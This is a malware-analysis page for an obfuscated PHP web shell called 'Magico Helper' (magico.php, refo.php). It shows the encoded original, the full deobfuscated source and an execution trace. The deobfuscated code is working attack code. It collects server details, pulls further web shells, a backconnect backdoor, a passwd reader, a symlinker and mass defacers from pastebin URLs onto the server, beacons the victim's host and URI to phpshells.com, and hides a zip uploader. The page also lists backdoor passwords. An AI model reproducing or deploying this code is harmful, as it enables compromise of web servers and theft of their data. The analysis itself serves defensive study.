PHP Malware Analysis

magico.php, refo.php

md5: f753e6b33671395ff702fc0302820895

Jump to: 

Screenshot
Attributes
Encoding

Environment

Execution

Files

Input

Title

URLs

Deobfuscated PHP code
<?php

$UeXploiT = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaag45hnkxRtXBOTkZ4akBmmCgTUA";
$An0n_3xPloiTeR = "=MYqtL4B/bP3HIaBc7jfRza9TEChfPFl7vCVBGKjiPC+NGx83wE2r7kP5PQ8C+wz0eY+9Hm//p/i+//0szY2L223nz/3rGSlNOIKUPD0E5HjdVNUDfu3C46QSeSdaIb76NpK1xqIEYDCKmbrLSi9iM8sMc9zv10nYwiD5Mw0HAasr4AJqHOJ10egEdU218SxaP3Fz5DKz4m7n5DDbvY1PO++GXu+20BKLLgwhkVLxMU9HOnOR2xZSklLElQNn5OTiTQK51KK7TuMJ+KLlNDAsxWoFo0CRI1+AyH33b5dZYp4R5UGLx+XReSo1HDFc0Pjz1YAn6UYcj4HoSPwt6A3UpZAElDnRTpVcZXxONlI6GZIcwNyqykItqf1HOnUGWYYb3s5KR5ZejR7lZc9XsqLfq61e3QuWlg3pbdExVeZltsd+Yn67vUNrrqvwu9Qrs+88fpXce9g1eX2R3fr11szLP85evhr+4wvs6tE0pHuv+AQ/TredddvPuayRrtiV7RhJcZ4mSnNt51HYVF5NPiKlMXjgpdiuycmEbMFSEQFVqmwDDNG7ITPfWktVyhBU9kwZbRH1iU2khcO/CAg6aDt8u2yv98lOiF3kX5s/2DVAP9ah+ipjvAIiniU1fskpy/mxWyroIG1nyMYwx9ckOAq0M/+E0/KGMy7X6t35QKUw3xpkRY1Lq5kuH5QZ3xDDYU0afXWxMdSEfqCshpjvQ5TuVayWFx+n2TONbfLsAlBlXINsy2eWwthwMUCoPQuiA5JMAIVn6WHH9Yc4OobG2yJhTmd0iZJoVd6mZs+ajdIYtcm+w0R6Z2PddHT4E8FxUsmF0fVPxzUudyXdhLiIGcgmQAnKhRspGoue2iLyBWx5qclPRuVQ6san2ZuD7KBMHEaN3uclpMZrZ6C9J1Zkx6f83EDJbbFbwnWfFs5j1fI9nTmTgXaUPp3vyoFZxOkGjTH4kmHieWyiAbCucIEzXBJCNKSldh0NFnJbni7Hc3lbXbqRicXD6jzKElHcNrUQyZyVrqCLHwmrfKcwO1fhWVZPEhKJzseprKgDTr4tlJfxaS9XeFfGJoTTcANrZOCklM2JmwngWOhRvXjZaQsFO/rQ0cXFKFR6b2zTX3trBLii/LAhtrLsSMOyWNpxEGOFXavT2oaPX93X970jHZ7E5AQC5nzsR8NMA/HFXK9zlQ1MgIFpAAPKurCA+s7vCNA+cvaeranbBEN+LiknftzyDxcsr11DnfwbTP8I3wO4RqgPnznBANuH8wsoutX9r6bRoPuutXoDv8wuEC7opF2W78qDyk64MtGmlds3H3yIifPudvtrnP4p5HRa8fdMn/Jv0FZC0bXvrN03zQ6dZsTbn3jg8DubTl5wCn+6uvaVSMctfGnm78nBAcG5r7Qv/0hrztBRSsf+ejmw6UNHzDvaXbHjD40w79Gm7dbVBjB0i/e+5201xHwTLH2Ld6XyQegnCxtzD+j0z3/bDi02ptLG08siaGtA49nO2fd+lbrcmZz0ZTbA2JsAs+Vbu3u3VGuBUaDyejgmh+xTSC2GQriv9idguPYTrjWaIY+LKCYhr2fb6V96jZOO1sAM3CkPa0QAUj3vOfY5hHrDgU+g1dFP3N6eFw7PsdMLPnW4pxRrNGeXBjYFnP0UwP8zvet3VKdaAlJGjKxqnr7ivNMYRlFvwdpwX/1EYzC8tu1gO/c5a2tUm4i0u/EI5omqKswY65YUwUGz23ZuX6f2pMxkrEsurxCL4MbdZP0og5iRtlrBo57Ps8k5mJkZcr6u8sz38CeweuJAxCBLMBwMqsZK5ozDsn4L8OE+HuCUrjQquYCuSEompNq4ZVUGwPEY4lOjxeQ0H4own8Tu/K7iaFnX89im2ZMfQbEr/qGncjFtRrJbyjEbyDYS4WvCWKEYbZiBzWSWjJpmmoSayCBWKAG0skq6DRVC4FrDzaZSzk1OuOmOT6i5D45yUOaPdFWQZxb4Ughk1uGPne3J29yzWkAdpvHUbrdv5pSXfBr2ey7aLxjCfyQjtWLXTLUnYedN5ECINnOqHWlBYroU0Of+JVoH/AXCIIFpDQlWSDPTYHYzKBN9LiL2I/0FW1UoLXcr566b+sP3h8sm+QFXOKZBt5Emx0BmNGAqr7SWGmlR9HKomDGfh0PUCfr5zfBougDBu546epa5IKguHze/PENGJ8EU0geRsUTNNZwNSyhO0wu2BKnEb8zNFy6XTzfDY5tI4HGeI3jHIKNdh8jBb6ewqqs2CGP7JMr9SKSCkqMiULEvNOMDAFHyRE6y3esuTMXhkJalNJlUXRkaOqP6qGoJSIZrOjVmxsGgMr3sT3D+aKWcJJeyww4pHPEkpsT6Mw6soLCYIEeFFrGFr6ppET2l73JEdOk1f96eJi0eOV5gKv7y5ADLvhc9XJPMVNxZKdxaeKzkvl0JB7vhbC9wz5dDKDLVjfLw4OSA1md2YCnl+7xkK+mS3in/6ZxDll03ki990bIjl567zuh18cOviOw9SBy/PeOeO8waLtxZzt85AixTaHM/oXwOvgNwhZGZ9EHIW9hrKArw7RTuHMr8BAt0Njcw6k28T2Wo3F+aPVltaDLM4HRnn9sZ1eofIc9wWHVMZK5T4rzsE8/8LQzCQkIzxDgAE+QnkNe3HEHhBBtgfnyM3ZcSWmyCNLSd69C9C8BhDRfxpAzHOUYhCd4byCAbEz0dl9mw8FSNEgN1FXOZYjidlGXTpgcDr+6GxtErx8cDw6s+QNVRNjrbaJWJMO2YxWzSEyGvGcfZuvNhe92zoCxq0bWJretqU8khGxwx1bFZW7BmKoYJ5Df6hW+VmNxIY0iM7j+WgLstkbMuekUOsE3zqDfyB3d9Khn4iIdbT39iyoykGkXdxc1qd/rX7tzuYj/G1m2Vf1aUxlbfJ5nwsyTunNCG13Sg2MudNsIFCzLJ2kJfJDsdXu9ujhClMcNvUUaTPQ9PPT4/219Mv4SYUAkmpdZGObaBqxC8AKIBXYvgpo5/mrL97yQsTO+ALj6ERCYP+OMB9lkcU0SHLQvN698x+MuOwfw6xeNl6pioSc/JK5ACG67VPbV1SNaHNZWqxWkxCKb1faPmX+ts8SB0qNY9CK+NjJMhQlJLepr+T2mfJ3lB6GY1iAV8VyaUSkYb0v3LSBbbO2AUftZfZV72I6p13ExQRbTxEu8YUCG2MAMXrGR9XMJeE4f/ZXMtmDe2ycyMnkhyimYPsJDMmaQ2lrojepHZAeo2lPEwZVWsivYRR4Ep3J19pIjSavk30X/2QAExA5ppWCL6p14oEQGsxsulPHBSrmCu9SWqot0iPm4S3OJpGgTKTNp2Uprld02JS9eHWmS3MYNLOBblHKwz16QLMxs1hWFLR3aKdZPTQaKM+Ai0jkUhXBjXW5lpNdLGBwGK/N8Khrtqtl88ZJAvWgqm891tMnT6pzG+uVtqSlVWxC9eEx7XVlbEQgQnKk0B5E/tP5ad6PeyyMGdFeuJ/DyV/ILELHXUvMaOFkffLJrYlRgWFET5huLThalUyO03id5gHkGtwip3qD9rumbZVc8yLoz9FkmhwrkCMo7ArkyJwMBrrZJBY21xXNGxwtWZVltEMWvapnZ6t3ru7pmLRgq1qypZjRONIvR7Zbv2v3ffzf4fWmXzRmxJrRLWnCbpNCXhmAYjJR42EQwAwOEKGHc+yi5KHKRDzbVN4vEKttUrrV3ciX9kow2BU/HKAeA";
eval /* PHPDeobfuscator eval output */ {
    ?><html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="content-type">
<title>.:! Magico HelpeR | PhpShells.Com :.</title>
</head>

<body style="background-color: black; color: rgb(0, 0, 0);"
alink="#ee0000" link="#0000ee" vlink="#551a8b">
<div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span
style="color: rgb(51, 204, 0); font-weight: bold;"><span
style="color: rgb(153, 153, 0);">.:!~@</span># </span><span

style="color: red; font-weight: bold;"><a href="https://phpshells.com/"> Magico Helper </a></span><span
style="font-weight: bold;"> </span><span
style="color: rgb(51, 204, 0); font-weight: bold;">#<span
style="color: rgb(153, 153, 0);">@~!:.</span></span><span
style="color: white;"></span>
<span style="font-weight: bold;"></span><br>
<span style="font-weight: bold;"><img
style="width: 300px; height: 150px;" alt=""
src="https://phpshells.com/wp-content/themes/phpshells/images/logo.png"></span><br>
<span style="font-weight: bold;"></span><small><span
style="color: rgb(0, 153, 0);"><big><small><b>.: <span
style="color: rgb(204, 153, 51);">Server InFo </span>:.</b></small></big></span></small><br>
<small><span style="color: rgb(0, 153, 0);"><big>
<small>---------------------------------------------------------------------------------------<br>
<?php 
    set_time_limit(0);
    error_reporting(0);
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server Software   : </span></b>" . $_SERVER['SERVER_SOFTWARE'] . "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server Admin      : </span></b>" . $_SERVER['SERVER_ADMIN'] . "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> User              : </span></b>" . get_current_user() . "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server IP         : </span></b>" . $_SERVER['SERVER_ADDR'] . "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Your IP           : </span></b>" . $_SERVER["REMOTE_ADDR"] . "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Uname             : </span></b>" . php_uname() . "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Php version       : </span></b>" . phpversion() . "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Dir               : </span></b>" . getcwd() . "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Safe Mode         : </span></b>";
    if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo "<br>";
    echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Curl                 :</span></b>";
    if (function_exists("curl_version")) {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Perl                 :</span></b>";
    if (function_exists("perl -h")) {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Python                 :</span></b>";
    if (function_exists("python -h")) {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Bash                 :</span></b>";
    if (function_exists("bash -h")) {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Mysql                 :</span></b>";
    if (function_exists("mysql_connect")) {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Mssql                 :</span></b>";
    if (function_exists("mssql_connect")) {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Oracle                 :</span></b>";
    if (function_exists("ocilogon")) {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Postgrase                 :</span></b>";
    if (function_exists("pg_connect")) {
        echo "<span style=\"font-weight: bold; color: red;\">On</span>";
    } else {
        echo "<span style=\"color: rgb(153, 153, 153);\">Off</span>";
    }
    echo "<br><b>[#]<span style=\"color: rgb(51, 204, 0);\"> Disable_functions  : </span></b>";
    $disable_funs = @ini_get('disable_functions');
    $arr = explode(',', $disable_funs);
    foreach ($arr as $fun) {
        echo "<span style=\"font-weight: bold; color: red;\">{$fun}</span>" . " - ";
    }
    echo "<br>";
    echo "---------------------------------------------------------------------------------------------------------------------------------------------------<br><br>";
    echo "<form method=\"post\">\r\n<b>[#]<span style=\\\"color: rgb(51, 204, 0);\\\"> Tools Grabber : <b></span><select name=\"tools\" >\r\n<option>===================</option>\r\n<option>hidden uploader</option>\r\n<option>k2ll33d shell</option>\r\n<option>x shell</option>\r\n<option>2015priv8bypass</option>\r\n<option>fwso shell</option>\r\n<option>awso shell</option>\r\n<option>mass</option>\r\n<option>/etc/passwd</option>\r\n<option>server users</option>\r\n<option>backconnect weevely</option>\r\n<option>turbo cpanel</option>\r\n<option>symlinker</option>\r\n<option>adminer</option>\r\n<option>mailer</option>\r\n<option>Magico pws</option>\r\n<option>safe mode</option>\r\n<option>404 shell</option>\r\n<option>wp mass info changer</option>\r\n<option>jo mass info changer</option>\r\n\r\n</select>\r\n<input type=\"submit\" name=\"get\" value=\"Get\" />\r\n</form>";
    /////////////////////////////////////////////////////////////////
    if (isset($_POST['get'])) {
        switch ($_POST['tools']) {
            case "x shell":
                echo phpshells('http://pastebin.com/raw.php?i=vYzbTTs8', 'oop.php');
                break;
            //////////////////////////////////////////////
            case "2015priv8bypass":
                echo phpshells('http://pastebin.com/raw.php?i=5CRWPuPN', 'r00t.php');
                break;
            //////////////////////////////////////////////
            case "hidden uploader":
                echo phpshells('http://pastebin.com/raw.php?i=cf8nikzF', 'upx.php');
                break;
            //////////////////////////////////////////////
            case "awso shell":
                echo phpshells('http://pastebin.com/raw.php?i=0USmsjpW', 'awso.php');
                break;
            //////////////////////////////////////////////
            case "mass":
                echo phpshells('http://pastebin.com/raw.php?i=dWAksQgN', 'mass.php');
                break;
            //////////////////////////////////////////////
            case "/etc/passwd":
                echo phpshells('http://pastebin.com/raw.php?i=KbwUY0aR', 'passwd.php');
                break;
            //////////////////////////////////////////////
            case "k2ll33d shell":
                echo phpshells('http://pastebin.com/raw.php?i=8mwwA4V2', 'k.php');
                break;
            //////////////////////////////////////////////
            case "fwso shell":
                echo phpshells('http://pastebin.com/raw.php?i=f2VWCsNY', 'fwso.php');
                break;
            //////////////////////////////////////////////
            case "adminer":
                echo phpshells('http://pastebin.com/raw.php?i=BZHXtZqu', 'adminer.php');
                break;
            //////////////////////////////////////////////
            case "backconnect weevely":
                echo phpshells('http://pastebin.com/raw.php?i=6YkfqzQ1', 'bc.php');
                break;
            //////////////////////////////////////////////
            case "turbo cpanel":
                echo phpshells('http://pastebin.com/raw.php?i=svbEfUPF', 'turbo.php');
                break;
            //////////////////////////////////////////////
            case "symlinker":
                echo phpshells('http://pastebin.com/raw.php?i=9zQFua4Z', 'symv4.php');
                break;
            //////////////////////////////////////////////
            case "server users":
                echo phpshells('http://pastebin.com/raw.php?i=5VKD1nEk', 'users.php');
                break;
            //////////////////////////////////////////////
            case "mailer":
                echo phpshells('http://pastebin.com/raw.php?i=9zzgByV6', 'wp-mailer.php');
                break;
            //////////////////////////////////////////////
            case "Magico pws":
                echo phpshells('http://pastebin.com/raw.php?i=r2mpC2tL', 'pws.php');
                break;
            //////////////////////////////////////////////
            case "safe mode":
                echo phpshells('http://pastebin.com/raw.php?i=Te1e1uhA', 'php.ini');
                break;
            //////////////////////////////////////////////
            case "404 shell":
                echo phpshells('http://pastebin.com/raw.php?i=0c3TeKDu', '404.php');
                break;
            //////////////////////////////////////////////
            case "wp mass info changer":
                echo phpshells('http://pastebin.com/raw.php?i=uNqDPzjR', 'wp-masser.php');
                break;
            //////////////////////////////////////////////
            case "jo mass info changer":
                echo phpshells('http://pastebin.com/raw.php?i=gvEdgkyK', 'jo-masser.php');
                break;
        }
        // switch end
    }
    // end if
    ////////////////////////////////////////////////////////////////
    // by INJECTOR_MA
    function phpshells($input, $output)
    {
        @mkdir('phpshells');
        @chdir('./phpshells');
        if (!file_exists($output)) {
            $cn = @file_get_contents($input);
            $save = fopen("{$output}", "a+");
            fwrite($save, @file_get_contents($input));
            fclose($save);
            return "<br>[#]DoNe: <a href=\"./phpshells/{$output}\"> Go to Here </a>";
        } else {
            return "<br>[#] Allready Here : <a href=\"./phpshells/{$output}\"> Go to Here </a>";
        }
    }
    ///////////////////////////////////////////////////////////////
    ?>

<br><br><br><br>
<span style="color: rgb(0, 153, 0);">[#]</span> <span
style="color: rgb(0, 153, 0);"><span style="color: rgb(51, 204, 0);"><span
style="color: rgb(153, 51, 153);">Please
Notice</span> :</span> the password of the <span
style="color: rgb(51, 204, 0);">[ weevely backdoor</span> ] is <span
style="color: rgb(153, 153, 0);">123456</span></span>
<br>
<span
style="color: rgb(0, 153, 0);">[#] the user of [<span
style="color: rgb(51, 204, 0);"> fwso shell</span>
] is <span style="color: rgb(153, 153, 0);">magico</span> and the
password is <span style="color: rgb(153, 153, 0);">xmagico</span></span>
<span style="color: rgb(0, 153, 0);"></span>
<br>
<span style="color: rgb(0, 153, 0);">[#] to view <span
style="color: rgb(51, 204, 0);">the hidden uplouder</span> write (<span
style="color: rgb(153, 153, 0);">up.php?x=x</span>) </span><br>
<span style="color: rgb(0, 153, 0);">[#] The Pass of <span
style="color: rgb(51, 204, 0);">404 shell</span> is</span><span
style="color: rgb(255, 204, 51);"> <span
style="color: rgb(204, 153, 51);">katibprv8</span></span>
<br><b>...::::::: PhpShells.Com ::::::::...</b>

</big></span></body></html>

<?php 
    echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"https://phpshells.com/hide/add.php?link=easycoder://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . '">';
    ?>

<?php 
    if (isset($_GET["katib"])) {
        echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
        echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
        if ($_POST['_upl'] == "Upload") {
            $file = $_FILES['file']['name'];
            if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
                $zip = new ZipArchive();
                if ($zip->open($file) === TRUE) {
                    $zip->extractTo('./');
                    $zip->close();
                    echo "Y\xc3\xbckleme Ba\xc5\x9far\xc4\xb1l\xc4\xb1";
                } else {
                    echo "Y\xc3\xbcklenmedi.";
                }
            } else {
                echo "<b>Basarisiz</b><br><br>";
            }
        }
    }
};
exit;
Execution traces
data/traces/f753e6b33671395ff702fc0302820895_trace-1676259105.8416.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:32:11.739429]
1	0	1	0.000183	393512
1	3	0	0.000277	398424	{main}	1		/var/www/html/uploads/refo.php	0	0
1		A						/var/www/html/uploads/refo.php	2	$UeXploiT = 'Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaag45hnkxRtXBOTkZ4akBmmCgTUA'
1		A						/var/www/html/uploads/refo.php	3	$An0n_3xPloiTeR = '=MYqtL4B/bP3HIaBc7jfRza9TEChfPFl7vCVBGKjiPC+NGx83wE2r7kP5PQ8C+wz0eY+9Hm//p/i+//0szY2L223nz/3rGSlNOIKUPD0E5HjdVNUDfu3C46QSeSdaIb76NpK1xqIEYDCKmbrLSi9iM8sMc9zv10nYwiD5Mw0HAasr4AJqHOJ10egEdU218SxaP3Fz5DKz4m7n5DDbvY1PO++GXu+20BKLLgwhkVLxMU9HOnOR2xZSklLElQNn5OTiTQK51KK7TuMJ+KLlNDAsxWoFo0CRI1+AyH33b5dZYp4R5UGLx+XReSo1HDFc0Pjz1YAn6UYcj4HoSPwt6A3UpZAElDnRTpVcZXxONlI6GZIcwNyqykItqf1HOnUGWYYb3s5KR5ZejR7lZc9XsqLfq61e3QuWlg3pbdExVeZltsd+Yn67vUNrrqvwu9Qrs+88fpXce9g1eX2R3fr11szLP85evhr+4wvs6tE0pHuv+AQ/TredddvPuayRrtiV7Rh'
2	4	0	0.000341	398424	base64_decode	0		/var/www/html/uploads/refo.php	4	1	'Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaag45hnkxRtXBOTkZ4akBmmCgTUA'
2	4	1	0.000362	398616
2	4	R			'K-K��P�WK/�V�K�*�K��-(J-.�H���K�I,IEb%%\026���ħ�&秤j\024�\024\025��i�8�\031��\033W\004��g��\006i��5\000'
2	5	0	0.000388	398584	gzinflate	0		/var/www/html/uploads/refo.php	4	1	'K-K��P�WK/�V�K�*�K��-(J-.�H���K�I,IEb%%\026���ħ�&秤j\024�\024\025��i�8�\031��\033W\004��g��\006i��5\000'
2	5	1	0.000413	398744
2	5	R			'eval(\'?&gt;\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));'
2	6	0	0.000432	398552	htmlspecialchars_decode	0		/var/www/html/uploads/refo.php	4	1	'eval(\'?&gt;\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));'
2	6	1	0.000451	398744
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));'
2	7	0	0.000481	400296	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));'	/var/www/html/uploads/refo.php	4	0
3	8	0	0.000499	400296	strrev	0		/var/www/html/uploads/refo.php(4) : eval()'d code	1	1	'=MYqtL4B/bP3HIaBc7jfRza9TEChfPFl7vCVBGKjiPC+NGx83wE2r7kP5PQ8C+wz0eY+9Hm//p/i+//0szY2L223nz/3rGSlNOIKUPD0E5HjdVNUDfu3C46QSeSdaIb76NpK1xqIEYDCKmbrLSi9iM8sMc9zv10nYwiD5Mw0HAasr4AJqHOJ10egEdU218SxaP3Fz5DKz4m7n5DDbvY1PO++GXu+20BKLLgwhkVLxMU9HOnOR2xZSklLElQNn5OTiTQK51KK7TuMJ+KLlNDAsxWoFo0CRI1+AyH33b5dZYp4R5UGLx+XReSo1HDFc0Pjz1YAn6UYcj4HoSPwt6A3UpZAElDnRTpVcZXxONlI6GZIcwNyqykItqf1HOnUGWYYb3s5KR5ZejR7lZc9XsqLfq61e3QuWlg3pbdExVeZltsd+Yn67vUNrrqvwu9Qrs+88fpXce9g1eX2R3fr11szLP85evhr+4wvs6tE0pHuv+AQ/TredddvPuayRrtiV7Rh'
3	8	1	0.000528	404424
3	8	R			'AeAKH/UB2wok9Xic3VrrUttKEv4NVbzDRKHK5iy+cHGKEOwAwQE24RJjYAmhXCNpbCnWLRrJxmRzXmWf4fzff3v2vbZ7RvINORjZpyq1qgRLmp7ur3t6ZnpavWMEtlVZWtwxGNXx12YBJZrrBMwJykrA7oMCkrwhmkF9zoLy8cVZbmur9Dq3piwtGkHg5di30OyUlahTLuh5TEFWgRlYrJLffkFOaMvUXHLELI/VyD/JueFdGMyyeP6da5Pt/E5B0kKnQgQEblVX7xEe9CxWVlSqtVu+Gzp6TnMt198mqgWvAJZ88ltqtrhK8N/KGwBGLdNpl5WXjBXhUkj0iA+MKaQTPZdKa3RLFWh1sxMLQ61zwKHlbBOLNYM3SmWHe9SJ20dlrpU2pNTKTgGpJO3S4mPi0toqWS9uCmrSBHPlusxsGQEo41p6LCWpp5AxEAQ2/X03kvaSjIp91J3pE4RRYvisWVZwEPl2oeAZHpejorl2QamMDJsPYmiyhknMycy2'
3	9	0	0.000556	404392	base64_decode	0		/var/www/html/uploads/refo.php(4) : eval()'d code	1	1	'AeAKH/UB2wok9Xic3VrrUttKEv4NVbzDRKHK5iy+cHGKEOwAwQE24RJjYAmhXCNpbCnWLRrJxmRzXmWf4fzff3v2vbZ7RvINORjZpyq1qgRLmp7ur3t6ZnpavWMEtlVZWtwxGNXx12YBJZrrBMwJykrA7oMCkrwhmkF9zoLy8cVZbmur9Dq3piwtGkHg5di30OyUlahTLuh5TEFWgRlYrJLffkFOaMvUXHLELI/VyD/JueFdGMyyeP6da5Pt/E5B0kKnQgQEblVX7xEe9CxWVlSqtVu+Gzp6TnMt198mqgWvAJZ88ltqtrhK8N/KGwBGLdNpl5WXjBXhUkj0iA+MKaQTPZdKa3RLFWh1sxMLQ61zwKHlbBOLNYM3SmWHe9SJ20dlrpU2pNTKTgGpJO3S4mPi0toqWS9uCmrSBHPlusxsGQEo41p6LCWpp5AxEAQ2/X03kvaSjIp91J3pE4RRYvisWVZwEPl2oeAZHpejorl2QamMDJsPYmiyhknMycy2'
3	9	1	0.000591	408520
3	9	R			'\001�\n\037�\001�\n$�x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA'
3	10	0	0.000687	404392	gzinflate	0		/var/www/html/uploads/refo.php(4) : eval()'d code	1	1	'\001�\n\037�\001�\n$�x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA'
3	10	1	0.000785	407496
3	10	R			'\001�\n$�x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA��\f�\017bh�'
3	11	0	0.000880	403368	gzinflate	0		/var/www/html/uploads/refo.php(4) : eval()'d code	1	1	'\001�\n$�x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA��\f�\017bh�'
3	11	1	0.000971	406472
3	11	R			'x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA��\f�\017bh��I��̶x9�'
